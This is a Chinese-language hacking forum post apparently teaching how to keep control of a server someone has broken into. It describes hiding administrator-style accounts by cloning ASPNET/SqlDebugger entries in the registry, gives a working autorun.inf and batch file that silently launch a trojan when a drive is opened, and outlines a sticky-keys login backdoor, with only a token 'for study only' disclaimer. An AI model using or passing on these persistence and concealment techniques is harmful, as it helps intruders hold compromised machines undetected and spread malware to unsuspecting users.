WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2180查看
  • 0回复

主题

好友

476

积分

禁止发言

发表于 2009-6-5 11:46:33 |显示全部楼层
给大家讲解拿到一台服务器后通过什么方法来保护住它,这里我来提3点!
第一点:拿到服务器以后要建立帐号等信息,一般的服务器上是有ASPNET,SqlDebugger
这2个帐户,要实在没有的话就建立后缀为$帐户,这样管理就无法从本地和组里看到了
要有上面提到的ASPNET,SqlDebugger的话.最好把这2个用户从注册表删除,然后在重新建立
注册表命令regedit 具体大家来看我操作,删除对应的帐户!我们进服务器,.只有一个ASPNET
也行,我们先进注册表把它删除,然后建立一个模拟的ASPNET,让管理员发现不了.大家看好我每步的点击到哪个目录!删除ASPNET同时也要删除类型0x3ef这个文件.我们现在打开桌面上软件建立一下.看到了吧又出来了,接着做,忘记把后面的介绍描述复制下来了,我们打一下吧.这样可以更有效的隐藏我们这个帐户,防真!我们按F5刷新一下,这个帐户就建立完成了,

第二点:留下后门,Auto来实现
Auto是通过光驱上的漏洞原理来制作的方法很简单.
[AutoRun]
OPEN=木马.exe
shellexecute=木马.exe
shell\Auto\command=木马.exe
然后保存为autorun.inf
我们这没有木马,我就拿这个建立隐藏用户无后门来做演示,把木马改名.
这样把autorun.inf 和木马属性该为隐藏 放入某个盘(c:\ d:\ e:\或U盘)是双击虽然运行了我们的木马,但是却打不开当前的盘,很容易被人中木马了,所以下面给大家讲下一种方法.
[AutoRun]
OPEN=1.bat
shellexecute=1.bat
shell\Auto\command=1.bat
将原先的木马该为一个批处理
建立名为1.bat的批处理
@echo off
set a=%~0
start %a:~0,1%:\
木马.exe
我们这里可以把它隐藏起来 这样管理就不会发现了,
我们注销一次再连接进来看看,我们双击打开C盘看一下.好了看到没有如果说这个建立隐藏后门这软件是木马的话就说明运行了我们木马了!大家看明白了吧!C盘照样可以进来的.


第三种:按五次shift键的后门,具体看我操作,打开shift配置器,配置一下我们自己设定好的用和密码来登陆,然后生成完毕以后,你觉得放到什么地方不容易被发现就放到什么地方,然后运行一下
运行以后,我们注销一下服务器,然后在未进入帐户前按5次shift看看会发现什么,
大家看我操作,输入我们刚才配置的帐号密码看看.呵呵,看到了没有.又进来了

以上工具大家可以到我的站里下载,我就不打包共享了!注意--仅限学习使用本教程切勿做违法事情

拿到1台服务器用以上三种方法结合起来,我相信一台服务器在你手里肯定有很长的保质期的哦

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-6 20:37 , Processed in 0.064960 second(s), 16 queries .

返回顶部